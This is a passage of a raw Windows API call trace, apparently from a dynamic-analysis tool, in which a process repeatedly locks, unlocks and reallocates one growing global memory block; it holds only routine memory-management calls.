[0188.852] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.852] GlobalUnlock (hMem=0x36000c) returned 0
[0188.852] GlobalReAlloc (hMem=0x36000c, dwBytes=0x34000, uFlags=0x2) returned 0x36000c
[0188.852] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.852] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.852] GlobalUnlock (hMem=0x36000c) returned 0
[0188.852] GlobalReAlloc (hMem=0x36000c, dwBytes=0x36000, uFlags=0x2) returned 0x36000c
[0188.852] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.853] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.853] GlobalUnlock (hMem=0x36000c) returned 0
[0188.853] GlobalReAlloc (hMem=0x36000c, dwBytes=0x38000, uFlags=0x2) returned 0x36000c
[0188.853] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.853] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.853] GlobalUnlock (hMem=0x36000c) returned 0
[0188.853] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3a000, uFlags=0x2) returned 0x36000c
[0188.853] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.854] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.854] GlobalUnlock (hMem=0x36000c) returned 0
[0188.854] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3c000, uFlags=0x2) returned 0x36000c
[0188.854] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.854] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.854] GlobalUnlock (hMem=0x36000c) returned 0
[0188.854] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3e000, uFlags=0x2) returned 0x36000c
[0188.854] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.855] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.855] GlobalUnlock (hMem=0x36000c) returned 0
[0188.855] GlobalReAlloc (hMem=0x36000c, dwBytes=0x40000, uFlags=0x2) returned 0x36000c
[0188.855] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.855] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.855] GlobalUnlock (hMem=0x36000c) returned 0
[0188.855] GlobalReAlloc (hMem=0x36000c, dwBytes=0x42000, uFlags=0x2) returned 0x36000c
[0188.855] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.856] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.856] GlobalUnlock (hMem=0x36000c) returned 0
[0188.856] GlobalReAlloc (hMem=0x36000c, dwBytes=0x44000, uFlags=0x2) returned 0x36000c
[0188.856] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.856] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.856] GlobalUnlock (hMem=0x36000c) returned 0
[0188.856] GlobalReAlloc (hMem=0x36000c, dwBytes=0x46000, uFlags=0x2) returned 0x36000c
[0188.856] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.857] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.857] GlobalUnlock (hMem=0x36000c) returned 0
[0188.857] GlobalReAlloc (hMem=0x36000c, dwBytes=0x48000, uFlags=0x2) returned 0x36000c
[0188.857] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.857] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.857] GlobalUnlock (hMem=0x36000c) returned 0
[0188.857] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4a000, uFlags=0x2) returned 0x36000c
[0188.857] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.858] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.858] GlobalUnlock (hMem=0x36000c) returned 0
[0188.858] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4c000, uFlags=0x2) returned 0x36000c
[0188.858] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.858] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.858] GlobalUnlock (hMem=0x36000c) returned 0
[0188.858] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4e000, uFlags=0x2) returned 0x36000c
[0188.858] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.859] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.859] GlobalUnlock (hMem=0x36000c) returned 0
[0188.859] GlobalReAlloc (hMem=0x36000c, dwBytes=0x50000, uFlags=0x2) returned 0x36000c
[0188.859] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.859] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.859] GlobalUnlock (hMem=0x36000c) returned 0
[0188.859] GlobalReAlloc (hMem=0x36000c, dwBytes=0x52000, uFlags=0x2) returned 0x36000c
[0188.859] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.860] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.860] GlobalUnlock (hMem=0x36000c) returned 0
[0188.860] GlobalReAlloc (hMem=0x36000c, dwBytes=0x54000, uFlags=0x2) returned 0x36000c
[0188.860] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.860] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.860] GlobalUnlock (hMem=0x36000c) returned 0
[0188.860] GlobalReAlloc (hMem=0x36000c, dwBytes=0x56000, uFlags=0x2) returned 0x36000c
[0188.860] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.861] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.861] GlobalUnlock (hMem=0x36000c) returned 0
[0188.861] GlobalReAlloc (hMem=0x36000c, dwBytes=0x58000, uFlags=0x2) returned 0x36000c
[0188.861] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.861] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.861] GlobalUnlock (hMem=0x36000c) returned 0
[0188.861] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5a000, uFlags=0x2) returned 0x36000c
[0188.861] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.862] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.862] GlobalUnlock (hMem=0x36000c) returned 0
[0188.862] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5c000, uFlags=0x2) returned 0x36000c
[0188.862] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.863] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.863] GlobalUnlock (hMem=0x36000c) returned 0
[0188.863] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5e000, uFlags=0x2) returned 0x36000c
[0188.863] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.863] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.863] GlobalUnlock (hMem=0x36000c) returned 0
[0188.863] GlobalReAlloc (hMem=0x36000c, dwBytes=0x60000, uFlags=0x2) returned 0x36000c
[0188.863] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.864] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.864] GlobalUnlock (hMem=0x36000c) returned 0
[0188.864] GlobalReAlloc (hMem=0x36000c, dwBytes=0x62000, uFlags=0x2) returned 0x36000c
[0188.864] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.864] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.864] GlobalUnlock (hMem=0x36000c) returned 0
[0188.864] GlobalReAlloc (hMem=0x36000c, dwBytes=0x64000, uFlags=0x2) returned 0x36000c
[0188.864] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.865] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.865] GlobalUnlock (hMem=0x36000c) returned 0
[0188.865] GlobalReAlloc (hMem=0x36000c, dwBytes=0x66000, uFlags=0x2) returned 0x36000c
[0188.865] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.866] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.866] GlobalUnlock (hMem=0x36000c) returned 0
[0188.866] GlobalReAlloc (hMem=0x36000c, dwBytes=0x68000, uFlags=0x2) returned 0x36000c
[0188.866] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.866] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.866] GlobalUnlock (hMem=0x36000c) returned 0
[0188.866] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6a000, uFlags=0x2) returned 0x36000c
[0188.866] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.867] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.867] GlobalUnlock (hMem=0x36000c) returned 0
[0188.867] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6c000, uFlags=0x2) returned 0x36000c
[0188.870] GlobalLock (hMem=0x36000c) returned 0x1c0820
[0188.871] GlobalHandle (pMem=0x1c0820) returned 0x36000c
[0188.871] GlobalUnlock (hMem=0x36000c) returned 0
[0188.871] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6e000, uFlags=0x2) returned 0x36000c
[0188.871] GlobalLock (hMem=0x36000c) returned 0x1c0820
[0188.872] GlobalHandle (pMem=0x1c0820) returned 0x36000c
[0188.872] GlobalUnlock (hMem=0x36000c) returned 0
[0188.872] GlobalReAlloc (hMem=0x36000c, dwBytes=0x70000, uFlags=0x2) returned 0x36000c
[0188.937] GlobalLock (hMem=0x36000c) returned 0x9b0048
[0188.938] GlobalHandle (pMem=0x9b0048) returned 0x36000c
[0188.938] GlobalUnlock (hMem=0x36000c) returned 0
[0188.938] GlobalReAlloc (hMem=0x36000c, dwBytes=0x72000, uFlags=0x2) returned 0x36000c
[0188.943] GlobalLock (hMem=0x36000c) returned 0xa20058
[0188.944] GlobalHandle (pMem=0xa20058) returned 0x36000c
[0188.944] GlobalUnlock (hMem=0x36000c) returned 0
[0188.944] GlobalReAlloc (hMem=0x36000c, dwBytes=0x74000, uFlags=0x2) returned 0x36000c
[0188.944] GlobalLock (hMem=0x36000c) returned 0xa20058
[0188.945] GlobalHandle (pMem=0xa20058) returned 0x36000c
[0188.945] GlobalUnlock (hMem=0x36000c) returned 0
[0188.945] GlobalReAlloc (hMem=0x36000c, dwBytes=0x76000, uFlags=0x2) returned 0x36000c
[0188.957] GlobalLock (hMem=0x36000c) returned 0x156810
[0188.957] GlobalHandle (pMem=0x156810) returned 0x36000c
[0188.957] GlobalUnlock (hMem=0x36000c) returned 0
[0188.957] GlobalReAlloc (hMem=0x36000c, dwBytes=0x78000, uFlags=0x2) returned 0x36000c
[0188.962] GlobalLock (hMem=0x36000c) returned 0x9b0048
[0188.962] GlobalHandle (pMem=0x9b0048) returned 0x36000c
[0188.962] GlobalUnlock (hMem=0x36000c) returned 0
[0188.962] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7a000, uFlags=0x2) returned 0x36000c
[0188.967] GlobalLock (hMem=0x36000c) returned 0xa28058
[0188.967] GlobalHandle (pMem=0xa28058) returned 0x36000c
[0188.967] GlobalUnlock (hMem=0x36000c) returned 0
[0188.967] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7c000, uFlags=0x2) returned 0x36000c
[0188.967] GlobalLock (hMem=0x36000c) returned 0xa28058
[0188.968] GlobalHandle (pMem=0xa28058) returned 0x36000c
[0188.968] GlobalUnlock (hMem=0x36000c) returned 0
[0188.968] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7e000, uFlags=0x2) returned 0x36000c
[0189.028] GlobalLock (hMem=0x36000c) returned 0xab0048
[0189.028] GlobalHandle (pMem=0xab0048) returned 0x36000c
[0189.028] GlobalUnlock (hMem=0x36000c) returned 0
[0189.028] GlobalReAlloc (hMem=0x36000c, dwBytes=0x80000, uFlags=0x2) returned 0x36000c
[0189.043] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.044] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.044] GlobalUnlock (hMem=0x36000c) returned 0
[0189.044] GlobalReAlloc (hMem=0x36000c, dwBytes=0x82000, uFlags=0x2) returned 0x36000c
[0189.053] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.054] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.054] GlobalUnlock (hMem=0x36000c) returned 0
[0189.054] GlobalReAlloc (hMem=0x36000c, dwBytes=0x84000, uFlags=0x2) returned 0x36000c
[0189.063] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.064] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.064] GlobalUnlock (hMem=0x36000c) returned 0
[0189.064] GlobalReAlloc (hMem=0x36000c, dwBytes=0x86000, uFlags=0x2) returned 0x36000c
[0189.120] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.121] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.121] GlobalUnlock (hMem=0x36000c) returned 0
[0189.121] GlobalReAlloc (hMem=0x36000c, dwBytes=0x88000, uFlags=0x2) returned 0x36000c
[0189.130] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.131] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.131] GlobalUnlock (hMem=0x36000c) returned 0
[0189.131] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8a000, uFlags=0x2) returned 0x36000c
[0189.140] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.141] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.141] GlobalUnlock (hMem=0x36000c) returned 0
[0189.141] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8c000, uFlags=0x2) returned 0x36000c
[0189.151] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.152] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.152] GlobalUnlock (hMem=0x36000c) returned 0
[0189.152] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8e000, uFlags=0x2) returned 0x36000c
[0189.208] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.209] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.209] GlobalUnlock (hMem=0x36000c) returned 0
[0189.209] GlobalReAlloc (hMem=0x36000c, dwBytes=0x90000, uFlags=0x2) returned 0x36000c
[0189.218] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.219] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.219] GlobalUnlock (hMem=0x36000c) returned 0
[0189.219] GlobalReAlloc (hMem=0x36000c, dwBytes=0x92000, uFlags=0x2) returned 0x36000c
[0189.229] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.230] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.230] GlobalUnlock (hMem=0x36000c) returned 0
[0189.230] GlobalReAlloc (hMem=0x36000c, dwBytes=0x94000, uFlags=0x2) returned 0x36000c
[0189.239] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.240] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.240] GlobalUnlock (hMem=0x36000c) returned 0
[0189.240] GlobalReAlloc (hMem=0x36000c, dwBytes=0x96000, uFlags=0x2) returned 0x36000c
[0189.250] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.251] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.251] GlobalUnlock (hMem=0x36000c) returned 0
[0189.251] GlobalReAlloc (hMem=0x36000c, dwBytes=0x98000, uFlags=0x2) returned 0x36000c
[0189.309] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.310] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.310] GlobalUnlock (hMem=0x36000c) returned 0
[0189.310] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9a000, uFlags=0x2) returned 0x36000c
[0189.321] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.322] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.322] GlobalUnlock (hMem=0x36000c) returned 0
[0189.322] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9c000, uFlags=0x2) returned 0x36000c
[0189.333] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.334] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.334] GlobalUnlock (hMem=0x36000c) returned 0
[0189.334] GlobalReAlloc (hMem=0x36000c, dwBytes=0x9e000, uFlags=0x2) returned 0x36000c
[0189.345] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.346] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.393] GlobalUnlock (hMem=0x36000c) returned 0
[0189.393] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa0000, uFlags=0x2) returned 0x36000c
[0189.403] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.404] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.404] GlobalUnlock (hMem=0x36000c) returned 0
[0189.404] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa2000, uFlags=0x2) returned 0x36000c
[0189.415] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.416] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.416] GlobalUnlock (hMem=0x36000c) returned 0
[0189.416] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa4000, uFlags=0x2) returned 0x36000c
[0189.427] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.427] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.428] GlobalUnlock (hMem=0x36000c) returned 0
[0189.428] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa6000, uFlags=0x2) returned 0x36000c
[0189.439] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.439] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.439] GlobalUnlock (hMem=0x36000c) returned 0
[0189.439] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa8000, uFlags=0x2) returned 0x36000c
[0189.499] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.500] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.500] GlobalUnlock (hMem=0x36000c) returned 0
[0189.500] GlobalReAlloc (hMem=0x36000c, dwBytes=0xaa000, uFlags=0x2) returned 0x36000c
[0189.511] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.511] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.512] GlobalUnlock (hMem=0x36000c) returned 0
[0189.512] GlobalReAlloc (hMem=0x36000c, dwBytes=0xac000, uFlags=0x2) returned 0x36000c
[0189.523] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.524] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.524] GlobalUnlock (hMem=0x36000c) returned 0
[0189.524] GlobalReAlloc (hMem=0x36000c, dwBytes=0xae000, uFlags=0x2) returned 0x36000c
[0189.583] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.583] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.583] GlobalUnlock (hMem=0x36000c) returned 0
[0189.583] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb0000, uFlags=0x2) returned 0x36000c
[0189.595] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.596] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.596] GlobalUnlock (hMem=0x36000c) returned 0
[0189.596] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb2000, uFlags=0x2) returned 0x36000c
[0189.608] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.609] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.609] GlobalUnlock (hMem=0x36000c) returned 0
[0189.609] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb4000, uFlags=0x2) returned 0x36000c
[0189.621] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.621] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.622] GlobalUnlock (hMem=0x36000c) returned 0
[0189.622] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb6000, uFlags=0x2) returned 0x36000c
[0189.666] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.667] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.667] GlobalUnlock (hMem=0x36000c) returned 0
[0189.667] GlobalReAlloc (hMem=0x36000c, dwBytes=0xb8000, uFlags=0x2) returned 0x36000c
[0189.679] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.680] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.680] GlobalUnlock (hMem=0x36000c) returned 0
[0189.680] GlobalReAlloc (hMem=0x36000c, dwBytes=0xba000, uFlags=0x2) returned 0x36000c
[0189.692] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.693] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.693] GlobalUnlock (hMem=0x36000c) returned 0
[0189.693] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbc000, uFlags=0x2) returned 0x36000c
[0189.708] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.708] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.708] GlobalUnlock (hMem=0x36000c) returned 0
[0189.708] GlobalReAlloc (hMem=0x36000c, dwBytes=0xbe000, uFlags=0x2) returned 0x36000c
[0189.722] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.722] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.722] GlobalUnlock (hMem=0x36000c) returned 0
[0189.722] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc0000, uFlags=0x2) returned 0x36000c
[0189.736] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.737] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.737] GlobalUnlock (hMem=0x36000c) returned 0
[0189.737] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc2000, uFlags=0x2) returned 0x36000c
[0189.751] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.786] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.786] GlobalUnlock (hMem=0x36000c) returned 0
[0189.786] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc4000, uFlags=0x2) returned 0x36000c
[0189.799] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.800] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.800] GlobalUnlock (hMem=0x36000c) returned 0
[0189.800] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc6000, uFlags=0x2) returned 0x36000c
[0189.813] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.814] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.814] GlobalUnlock (hMem=0x36000c) returned 0
[0189.814] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc8000, uFlags=0x2) returned 0x36000c
[0189.827] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.827] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.827] GlobalUnlock (hMem=0x36000c) returned 0
[0189.827] GlobalReAlloc (hMem=0x36000c, dwBytes=0xca000, uFlags=0x2) returned 0x36000c
[0189.902] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.903] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.903] GlobalUnlock (hMem=0x36000c) returned 0
[0189.903] GlobalReAlloc (hMem=0x36000c, dwBytes=0xcc000, uFlags=0x2) returned 0x36000c
[0189.917] GlobalLock (hMem=0x36000c) returned 0x8a0020
[0189.918] GlobalHandle (pMem=0x8a0020) returned 0x36000c
[0189.918] GlobalUnlock (hMem=0x36000c) returned 0
[0189.918] GlobalReAlloc (hMem=0x36000c, dwBytes=0xce000, uFlags=0x2) returned 0x36000c
[0189.969] GlobalLock (hMem=0x36000c) returned 0x2630020
[0189.970] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0189.970] GlobalUnlock (hMem=0x36000c) returned 0
[0189.970] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd0000, uFlags=0x2) returned 0x36000c
[0189.984] GlobalLock (hMem=0x36000c) returned 0x2700020
[0189.985] GlobalHandle (pMem=0x2700020) returned 0x36000c
[0189.985] GlobalUnlock (hMem=0x36000c) returned 0
[0189.985] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd2000, uFlags=0x2) returned 0x36000c
[0190.009] GlobalLock (hMem=0x36000c) returned 0x27e0020
[0190.010] GlobalHandle (pMem=0x27e0020) returned 0x36000c
[0190.010] GlobalUnlock (hMem=0x36000c) returned 0
[0190.010] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd4000, uFlags=0x2) returned 0x36000c
[0190.025] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.025] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.025] GlobalUnlock (hMem=0x36000c) returned 0
[0190.025] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd6000, uFlags=0x2) returned 0x36000c
[0190.040] GlobalLock (hMem=0x36000c) returned 0x2710020
[0190.041] GlobalHandle (pMem=0x2710020) returned 0x36000c
[0190.041] GlobalUnlock (hMem=0x36000c) returned 0
[0190.041] GlobalReAlloc (hMem=0x36000c, dwBytes=0xd8000, uFlags=0x2) returned 0x36000c
[0190.057] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.058] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.058] GlobalUnlock (hMem=0x36000c) returned 0
[0190.058] GlobalReAlloc (hMem=0x36000c, dwBytes=0xda000, uFlags=0x2) returned 0x36000c
[0190.084] GlobalLock (hMem=0x36000c) returned 0x2710020
[0190.084] GlobalHandle (pMem=0x2710020) returned 0x36000c
[0190.084] GlobalUnlock (hMem=0x36000c) returned 0
[0190.084] GlobalReAlloc (hMem=0x36000c, dwBytes=0xdc000, uFlags=0x2) returned 0x36000c
[0190.099] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.100] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.100] GlobalUnlock (hMem=0x36000c) returned 0
[0190.100] GlobalReAlloc (hMem=0x36000c, dwBytes=0xde000, uFlags=0x2) returned 0x36000c
[0190.115] GlobalLock (hMem=0x36000c) returned 0x2710020
[0190.116] GlobalHandle (pMem=0x2710020) returned 0x36000c
[0190.116] GlobalUnlock (hMem=0x36000c) returned 0
[0190.116] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe0000, uFlags=0x2) returned 0x36000c
[0190.131] GlobalLock (hMem=0x36000c) returned 0x27f0020
[0190.132] GlobalHandle (pMem=0x27f0020) returned 0x36000c
[0190.132] GlobalUnlock (hMem=0x36000c) returned 0
[0190.132] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe2000, uFlags=0x2) returned 0x36000c
[0190.147] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.148] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.148] GlobalUnlock (hMem=0x36000c) returned 0
[0190.148] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe4000, uFlags=0x2) returned 0x36000c
[0190.164] GlobalLock (hMem=0x36000c) returned 0x2720020
[0190.165] GlobalHandle (pMem=0x2720020) returned 0x36000c
[0190.165] GlobalUnlock (hMem=0x36000c) returned 0
[0190.165] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe6000, uFlags=0x2) returned 0x36000c
[0190.184] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.184] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.184] GlobalUnlock (hMem=0x36000c) returned 0
[0190.185] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe8000, uFlags=0x2) returned 0x36000c
[0190.201] GlobalLock (hMem=0x36000c) returned 0x2720020
[0190.202] GlobalHandle (pMem=0x2720020) returned 0x36000c
[0190.202] GlobalUnlock (hMem=0x36000c) returned 0
[0190.202] GlobalReAlloc (hMem=0x36000c, dwBytes=0xea000, uFlags=0x2) returned 0x36000c
[0190.217] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.218] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.218] GlobalUnlock (hMem=0x36000c) returned 0
[0190.218] GlobalReAlloc (hMem=0x36000c, dwBytes=0xec000, uFlags=0x2) returned 0x36000c
[0190.234] GlobalLock (hMem=0x36000c) returned 0x2720020
[0190.235] GlobalHandle (pMem=0x2720020) returned 0x36000c
[0190.235] GlobalUnlock (hMem=0x36000c) returned 0
[0190.235] GlobalReAlloc (hMem=0x36000c, dwBytes=0xee000, uFlags=0x2) returned 0x36000c
[0190.250] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.254] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.254] GlobalUnlock (hMem=0x36000c) returned 0
[0190.254] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf0000, uFlags=0x2) returned 0x36000c
[0190.270] GlobalLock (hMem=0x36000c) returned 0x2720020
[0190.271] GlobalHandle (pMem=0x2720020) returned 0x36000c
[0190.271] GlobalUnlock (hMem=0x36000c) returned 0
[0190.271] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf2000, uFlags=0x2) returned 0x36000c
[0190.287] GlobalLock (hMem=0x36000c) returned 0x2820020
[0190.287] GlobalHandle (pMem=0x2820020) returned 0x36000c
[0190.287] GlobalUnlock (hMem=0x36000c) returned 0
[0190.287] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf4000, uFlags=0x2) returned 0x36000c
[0190.306] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.306] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.306] GlobalUnlock (hMem=0x36000c) returned 0
[0190.306] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf6000, uFlags=0x2) returned 0x36000c
[0190.322] GlobalLock (hMem=0x36000c) returned 0x2730020
[0190.323] GlobalHandle (pMem=0x2730020) returned 0x36000c
[0190.323] GlobalUnlock (hMem=0x36000c) returned 0
[0190.323] GlobalReAlloc (hMem=0x36000c, dwBytes=0xf8000, uFlags=0x2) returned 0x36000c
[0190.339] GlobalLock (hMem=0x36000c) returned 0x2630020
[0190.340] GlobalHandle (pMem=0x2630020) returned 0x36000c
[0190.340] GlobalUnlock (hMem=0x36000c) returned 0
